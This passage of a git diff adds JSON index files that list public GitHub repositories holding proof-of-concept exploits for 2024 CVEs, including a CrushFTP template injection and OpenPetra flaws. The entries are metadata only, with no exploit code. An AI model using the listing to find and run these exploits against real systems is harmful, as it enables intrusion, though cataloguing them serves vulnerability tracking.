vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.", + "fork": false, + "created_at": "2024-05-03T23:29:53Z", + "updated_at": "2024-12-06T09:40:40Z", + "pushed_at": "2024-05-04T00:05:16Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 800094876, + "name": "CVE-2024-4040", + "full_name": "1ncendium\/CVE-2024-4040", + "owner": { + "login": "1ncendium", + "id": 50025292, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50025292?v=4", + "html_url": "https:\/\/github.com\/1ncendium", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1ncendium\/CVE-2024-4040", + "description": "A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server. ", + "fork": false, + "created_at": "2024-05-13T17:33:36Z", + "updated_at": "2024-05-13T17:33:41Z", + "pushed_at": "2024-05-13T17:33:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821345624, + "name": "CVE-2024-4040", + "full_name": "olebris\/CVE-2024-4040", + "owner": { + "login": "olebris", + "id": 78493240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78493240?v=4", + "html_url": "https:\/\/github.com\/olebris", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/olebris\/CVE-2024-4040", + "description": "CVE-2024-4040 PoC", + "fork": false, + "created_at": "2024-06-28T10:32:51Z", + "updated_at": "2024-06-28T11:50:56Z", + "pushed_at": "2024-06-28T10:33:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824427234, + "name": "CVE-2024-4040", + "full_name": "entroychang\/CVE-2024-4040", + "owner": { + "login": "entroychang", + "id": 56551382, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56551382?v=4", + "html_url": "https:\/\/github.com\/entroychang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/entroychang\/CVE-2024-4040", + "description": "CVE-2024-4040 PoC", + "fork": false, + "created_at": "2024-07-05T05:46:56Z", + "updated_at": "2024-12-06T09:40:42Z", + "pushed_at": "2024-07-09T09:48:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-4040", + "exploit" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 859098985, + "name": "CrushFTP-cve-2024-4040-poc", + "full_name": "safeer-accuknox\/CrushFTP-cve-2024-4040-poc", + "owner": { + "login": "safeer-accuknox", + "id": 180378107, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/180378107?v=4", + "html_url": "https:\/\/github.com\/safeer-accuknox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/safeer-accuknox\/CrushFTP-cve-2024-4040-poc", + "description": null, + "fork": false, + "created_at": "2024-09-18T04:45:54Z", + "updated_at": "2024-10-16T07:21:52Z", + "pushed_at": "2024-10-16T07:21:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 865497094, + "name": "GenCrushSSTIExploit", + "full_name": "geniuszly\/GenCrushSSTIExploit", + "owner": { + "login": "geniuszly", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszly\/GenCrushSSTIExploit", + "description": "is a PoC for CVE-2024-4040 tool for exploiting the SSTI vulnerability in CrushFTP", + "fork": false, + "created_at": "2024-09-30T16:18:07Z", + "updated_at": "2024-11-20T16:31:06Z", + "pushed_at": "2024-09-30T16:19:24Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "crush", + "crush-ssti", + "cve", + "cve-2024-4040", + "cybersecurity", + "ethical-hacking", + "exploit", + "exploit-development", + "gencrushsstiexploit", + "penetration-testing", + "security", + "server-side-template-injection", + "ssti", + "vulnerability", + "web-security" + ], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 877132815, + "name": "CVE-2024-4040", + "full_name": "rahisec\/CVE-2024-4040", + "owner": { + "login": "rahisec", + "id": 35906436, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35906436?v=4", + "html_url": "https:\/\/github.com\/rahisec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rahisec\/CVE-2024-4040", + "description": null, + "fork": false, + "created_at": "2024-10-23T06:29:19Z", + "updated_at": "2024-10-23T06:31:12Z", + "pushed_at": "2024-10-23T06:31:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40422.json b/2024/CVE-2024-40422.json new file mode 100644 index 0000000000..787e4aeb6c --- /dev/null +++ b/2024/CVE-2024-40422.json @@ -0,0 +1,64 @@ +[ + { + "id": 823856753, + "name": "CVE-2024-40422", + "full_name": "alpernae\/CVE-2024-40422", + "owner": { + "login": "alpernae", + "id": 39368379, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39368379?v=4", + "html_url": "https:\/\/github.com\/alpernae", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alpernae\/CVE-2024-40422", + "description": null, + "fork": false, + "created_at": "2024-07-03T21:43:15Z", + "updated_at": "2024-11-20T16:30:53Z", + "pushed_at": "2024-07-30T10:40:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 838700943, + "name": "CVE-2024-40422", + "full_name": "j3r1ch0123\/CVE-2024-40422", + "owner": { + "login": "j3r1ch0123", + "id": 110147529, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110147529?v=4", + "html_url": "https:\/\/github.com\/j3r1ch0123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j3r1ch0123\/CVE-2024-40422", + "description": "Found this on exploit-db, decided to make my own for practice. This exploit will search out the passwd file and print the contents on a vulnerable system.", + "fork": false, + "created_at": "2024-08-06T07:09:47Z", + "updated_at": "2024-11-20T16:30:59Z", + "pushed_at": "2024-08-06T20:19:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40431.json b/2024/CVE-2024-40431.json new file mode 100644 index 0000000000..878bbb9da4 --- /dev/null +++ b/2024/CVE-2024-40431.json @@ -0,0 +1,33 @@ +[ + { + "id": 858573400, + "name": "CVE-2024-40431-CVE-2022-25479-EOP-CHAIN", + "full_name": "SpiralBL0CK\/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN", + "description": "CVE-2024-40431+CVE-2022-25479 chain for EOP(DATA ONLY ATTACK) ", + "fork": false, + "created_at": "2024-09-17T06:28:17Z", + "updated_at": "2024-12-06T09:40:43Z", + "pushed_at": "2024-10-16T22:27:13Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 44, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40443.json b/2024/CVE-2024-40443.json new file mode 100644 index 0000000000..b302bae0a7 --- /dev/null +++ b/2024/CVE-2024-40443.json @@ -0,0 +1,33 @@ +[ + { + "id": 886294827, + "name": "CVE-2024-40443", + "full_name": "Yuma-Tsushima07\/CVE-2024-40443", + "owner": { + "login": "Yuma-Tsushima07", + "id": 63207324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63207324?v=4", + "html_url": "https:\/\/github.com\/Yuma-Tsushima07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yuma-Tsushima07\/CVE-2024-40443", + "description": "CVE-2024-40443 - A SQL Injection vulnerability in Computer Laboratory Management System v1.0 allows attackers to execute arbitrary SQL commands ", + "fork": false, + "created_at": "2024-11-10T17:35:14Z", + "updated_at": "2024-11-10T17:41:02Z", + "pushed_at": "2024-11-10T17:40:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40457.json b/2024/CVE-2024-40457.json new file mode 100644 index 0000000000..328d4ce1eb --- /dev/null +++ b/2024/CVE-2024-40457.json @@ -0,0 +1,33 @@ +[ + { + "id": 880953987, + "name": "CVE-2024-40457-PoC", + "full_name": "jeppojeps\/CVE-2024-40457-PoC", + "owner": { + "login": "jeppojeps", + "id": 7843530, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7843530?v=4", + "html_url": "https:\/\/github.com\/jeppojeps", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jeppojeps\/CVE-2024-40457-PoC", + "description": "CVE PoC 2024-40457", + "fork": false, + "created_at": "2024-10-30T16:51:31Z", + "updated_at": "2024-10-31T15:14:04Z", + "pushed_at": "2024-10-30T16:52:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40492.json b/2024/CVE-2024-40492.json new file mode 100644 index 0000000000..30ca94ceb4 --- /dev/null +++ b/2024/CVE-2024-40492.json @@ -0,0 +1,33 @@ +[ + { + "id": 828086923, + "name": "POC_CVE-2024-40492", + "full_name": "minendie\/POC_CVE-2024-40492", + "owner": { + "login": "minendie", + "id": 92912837, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92912837?v=4", + "html_url": "https:\/\/github.com\/minendie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/minendie\/POC_CVE-2024-40492", + "description": null, + "fork": false, + "created_at": "2024-07-13T04:57:48Z", + "updated_at": "2024-07-13T04:59:09Z", + "pushed_at": "2024-07-13T04:59:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40498.json b/2024/CVE-2024-40498.json new file mode 100644 index 0000000000..e1dae0a101 --- /dev/null +++ b/2024/CVE-2024-40498.json @@ -0,0 +1,33 @@ +[ + { + "id": 835178303, + "name": "CVE-2024-40498", + "full_name": "Dirac231\/CVE-2024-40498", + "owner": { + "login": "Dirac231", + "id": 74907503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74907503?v=4", + "html_url": "https:\/\/github.com\/Dirac231", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dirac231\/CVE-2024-40498", + "description": null, + "fork": false, + "created_at": "2024-07-29T10:13:15Z", + "updated_at": "2024-07-29T10:18:44Z", + "pushed_at": "2024-07-29T10:18:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40500.json b/2024/CVE-2024-40500.json new file mode 100644 index 0000000000..5d2e36ceec --- /dev/null +++ b/2024/CVE-2024-40500.json @@ -0,0 +1,33 @@ +[ + { + "id": 839960824, + "name": "CVE-2024-40500", + "full_name": "nitipoom-jar\/CVE-2024-40500", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2024-40500", + "description": null, + "fork": false, + "created_at": "2024-08-08T17:12:58Z", + "updated_at": "2024-08-08T17:45:53Z", + "pushed_at": "2024-08-08T17:45:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40506.json b/2024/CVE-2024-40506.json new file mode 100644 index 0000000000..cce4b063cf --- /dev/null +++ b/2024/CVE-2024-40506.json @@ -0,0 +1,33 @@ +[ + { + "id": 828350259, + "name": "CVE-2024-40506", + "full_name": "Jansen-C-Moreira\/CVE-2024-40506", + "owner": { + "login": "Jansen-C-Moreira", + "id": 66726884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66726884?v=4", + "html_url": "https:\/\/github.com\/Jansen-C-Moreira", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jansen-C-Moreira\/CVE-2024-40506", + "description": "OpenPetra v.2023.02 CVE-2024-40506", + "fork": false, + "created_at": "2024-07-13T21:42:23Z", + "updated_at": "2024-07-13T22:08:39Z", + "pushed_at": "2024-07-13T22:08:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40507.json b/2024/CVE-2024-40507.json new file mode 100644 index 0000000000..7b22b69655 --- /dev/null +++ b/2024/CVE-2024-40507.json @@ -0,0 +1,33 @@ +[ + { + "id": 828351831, + "name": "CVE-2024-40507", + "full_name": "Jansen-C-Moreira\/CVE-2024-40507", + "owner": { + "login": "Jansen-C-Moreira", + "id": 66726884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66726884?v=4", + "html_url": "https:\/\/github.com\/Jansen-C-Moreira", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jansen-C-Moreira\/CVE-2024-40507", + "description": "OpenPetra v.2023.02 Use CVE-2024-40507", + "fork": false, + "created_at": "2024-07-13T21:50:57Z", + "updated_at": "2024-07-13T22:09:08Z", + "pushed_at": "2024-07-13T22:09:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40508.json b/2024/CVE-2024-40508.json new file mode 100644 index 0000000000..f9812e171b --- /dev/null +++ b/2024/CVE-2024-40508.json @@ -0,0 +1,33 @@ +[ + { + "id": 828352382, + "name": "CVE-2024-40508", + "full_name": "Jansen-C-Moreira\/CVE-2024-40508", + "owner": { + "login": "Jansen-C-Moreira", + "id": 66726884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66726884?v=4", + "html_url": "https:\/\/github.com\/Jansen-C-Moreira", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jansen-C-Moreira\/CVE-2024-40508", + "description": "OpenPetra v.2023.02 CVE-2024-40508", + "fork": false, + "created_at": "2024-07-13T21:54:07Z", + "updated_at": "2024-07-13T21:58:51Z", + "pushed_at": "2024-07-13T21:58:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40509.json b/2024/CVE-2024-40509.json new file mode 100644 index 0000000000..2313fd6da1 --- /dev/null +++ b/2024/CVE-2024-40509.json @@ -0,0 +1,33 @@ +[ + { + "id": 828353646, + "name": "CVE-2024-40509", + "full_name": "Jansen-C-Moreira\/CVE-2024-40509", + "owner": { + "login": "Jansen-C-Moreira", + "id": 66726884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66726884?v=4", + "html_url": "https:\/\/github.com\/Jansen-C-Moreira", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jansen-C-Moreira\/CVE-2024-40509", + "description": "OpenPetra v.2023.02 CVE-2024-40509", + "fork": false, + "created_at": "2024-07-13T22:01:39Z", + "updated_at": "2024-07-13T22:02:57Z", + "pushed_at": "2024-07-13T22:02:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40510.json b/2024/CVE-2024-40510.json new file mode 100644 index 0000000000..e4117e94c2 --- /dev/null +++ b/2024/CVE-2024-40510.json @@ -0,0 +1,33 @@ +[ + { + "id": 828353896, + "name": "CVE-2024-40510", + "full_name": "Jansen-C-Moreira\/CVE-2024-40510", + "owner": { + "login": "Jansen-C-Moreira", + "id": 66726884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66726884?v=4", + "html_url": "https:\/\/github.com\/Jansen-C-Moreira", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jansen-C-Moreira\/CVE-2024-40510", + "description": "OpenPetra v.2023.02 CVE-2024-40510", + "fork": false, + "created_at": "2024-07-13T22:03:17Z", + "updated_at": "2024-07-13T22:04:37Z", + "pushed_at": "2024-07-13T22:04:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40511.json b/2024/CVE-2024-40511.json new file mode 100644 index 0000000000..b54092ec86 --- /dev/null +++ b/2024/CVE-2024-40511.json @@ -0,0 +1,33 @@ +[ + { + "id": 828354193, + "name": "CVE-2024-40511", + "full_name": "Jansen-C-Moreira\/CVE-2024-40511", + "owner": { + "login": "Jansen-C-Moreira", + "id": 66726884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66726884?v=4", + "html_url": "https:\/\/github.com\/Jansen-C-Moreira", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jansen-C-Moreira\/CVE-2024-40511", + "description": "OpenPetra v.2023.02 CVE-2024-40511", + "fork": false, + "created_at": "2024-07-13T22:04:53Z", + "updated_at": "2024-07-13T22:05:49Z", + "pushed_at": "2024-07-13T22:05:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40512.json b/2024/CVE-2024-40512.json new file mode 100644 index 0000000000..786cffacce --- /dev/null +++ b/2024/CVE-2024-40512.json @@ -0,0 +1,33 @@ +[ + { + "id": 828354452, + "name": "CVE-2024-40512", + "full_name": "Jansen-C-Moreira\/CVE-2024-40512", + "owner": { + "login": "Jansen-C-Moreira", + "id": 66726884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66726884?v=4", + "html_url": "https:\/\/github.com\/Jansen-C-Moreira", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jansen-C-Moreira\/CVE-2024-40512", + "description": "OpenPetra v.2023.02 CVE-2024-40512", + "fork": false, + "created_at": "2024-07-13T22:06:16Z", + "updated_at": "2024-07-13T22:07:10Z", + "pushed_at": "2024-07-13T22:07:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40617.json b/2024/CVE-2024-40617.json new file mode 100644 index 0000000000..43845367dc --- /dev/null +++ b/2024/CVE-2024-40617.json @@ -0,0 +1,33 @@ +[ + { + "id": 835716921, + "name": "CVE-2024-40617", + "full_name": "KyssK00L\/CVE-2024-40617", + "owner": { + "login": "KyssK00L", + "id": 6824863, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6824863?v=4", + "html_url": "https:\/\/github.com\/KyssK00L", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KyssK00L\/CVE-2024-40617", + "description": "CVE-2024-40617 Exploit PoC", + "fork": false, + "created_at": "2024-07-30T11:50:45Z", + "updated_at": "2024-08-04T11:23:43Z", + "pushed_at": "2024-07-30T14:43:14Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40658.json b/2024/CVE-2024-40658.json new file mode 100644 index 0000000000..1e77147fef --- /dev/null +++ b/2024/CVE-2024-40658.json @@ -0,0 +1,33 @@ +[ + { + "id": 832468670, + "name": "frameworks_av_AOSP10_r33_CVE-2024-40658", + "full_name": "nidhihcl75\/frameworks_av_AOSP10_r33_CVE-2024-40658", + "owner": { + "login": "nidhihcl75", + "id": 176363052, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176363052?v=4", + "html_url": "https:\/\/github.com\/nidhihcl75", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nidhihcl75\/frameworks_av_AOSP10_r33_CVE-2024-40658", + "description": null, + "fork": false, + "created_at": "2024-07-23T05:04:03Z", + "updated_at": "2024-10-09T09:57:26Z", + "pushed_at": "2024-10-09T09:57:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40662.json b/2024/CVE-2024-40662.json new file mode 100644 index 0000000000..e995fb9492 --- /dev/null +++ b/2024/CVE-2024-40662.json @@ -0,0 +1,33 @@ +[ + { + "id": 874208395, + "name": "net_G2.5_CVE-2024-40662", + "full_name": "Aakashmom\/net_G2.5_CVE-2024-40662", + "owner": { + "login": "Aakashmom", + "id": 76400693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76400693?v=4", + "html_url": "https:\/\/github.com\/Aakashmom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aakashmom\/net_G2.5_CVE-2024-40662", + "description": null, + "fork": false, + "created_at": "2024-10-17T12:39:21Z", + "updated_at": "2024-10-17T12:40:47Z", + "pushed_at": "2024-10-17T12:40:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40673.json b/2024/CVE-2024-40673.json new file mode 100644 index 0000000000..dac3c0165f --- /dev/null +++ b/2024/CVE-2024-40673.json @@ -0,0 +1,33 @@ +[ + { + "id": 874201744, + "name": "G3_libcore_native_CVE-2024-40673", + "full_name": "Aakashmom\/G3_libcore_native_CVE-2024-40673", + "owner": { + "login": "Aakashmom", + "id": 76400693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76400693?v=4", + "html_url": "https:\/\/github.com\/Aakashmom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aakashmom\/G3_libcore_native_CVE-2024-40673", + "description": null, + "fork": false, + "created_at": "2024-10-17T12:26:24Z", + "updated_at": "2024-10-17T12:28:06Z", + "pushed_at": "2024-10-17T12:28:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40675.json b/2024/CVE-2024-40675.json new file mode 100644 index 0000000000..73aeeea7f0 --- /dev/null +++ b/2024/CVE-2024-40675.json @@ -0,0 +1,33 @@ +[ + { + "id": 874181651, + "name": "intent_CVE-2024-40675", + "full_name": "Aakashmom\/intent_CVE-2024-40675", + "owner": { + "login": "Aakashmom", + "id": 76400693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76400693?v=4", + "html_url": "https:\/\/github.com\/Aakashmom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aakashmom\/intent_CVE-2024-40675", + "description": null, + "fork": false, + "created_at": "2024-10-17T11:46:29Z", + "updated_at": "2024-10-17T11:47:50Z", + "pushed_at": "2024-10-17T11:47:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40676.json b/2024/CVE-2024-40676.json new file mode 100644 index 0000000000..6860c45fda --- /dev/null +++ b/2024/CVE-2024-40676.json @@ -0,0 +1,64 @@ +[ + { + "id": 874173855, + "name": "frameworks_base_accounts_CVE-2024-40676", + "full_name": "Aakashmom\/frameworks_base_accounts_CVE-2024-40676", + "owner": { + "login": "Aakashmom", + "id": 76400693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76400693?v=4", + "html_url": "https:\/\/github.com\/Aakashmom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aakashmom\/frameworks_base_accounts_CVE-2024-40676", + "description": null, + "fork": false, + "created_at": "2024-10-17T11:29:33Z", + "updated_at": "2024-10-17T11:33:08Z", + "pushed_at": "2024-10-17T11:33:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 874178814, + "name": "accounts_CVE-2024-40676-", + "full_name": "Aakashmom\/accounts_CVE-2024-40676-", + "owner": { + "login": "Aakashmom", + "id": 76400693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76400693?v=4", + "html_url": "https:\/\/github.com\/Aakashmom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aakashmom\/accounts_CVE-2024-40676-", + "description": null, + "fork": false, + "created_at": "2024-10-17T11:40:21Z", + "updated_at": "2024-10-28T05:12:15Z", + "pushed_at": "2024-10-17T11:42:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } 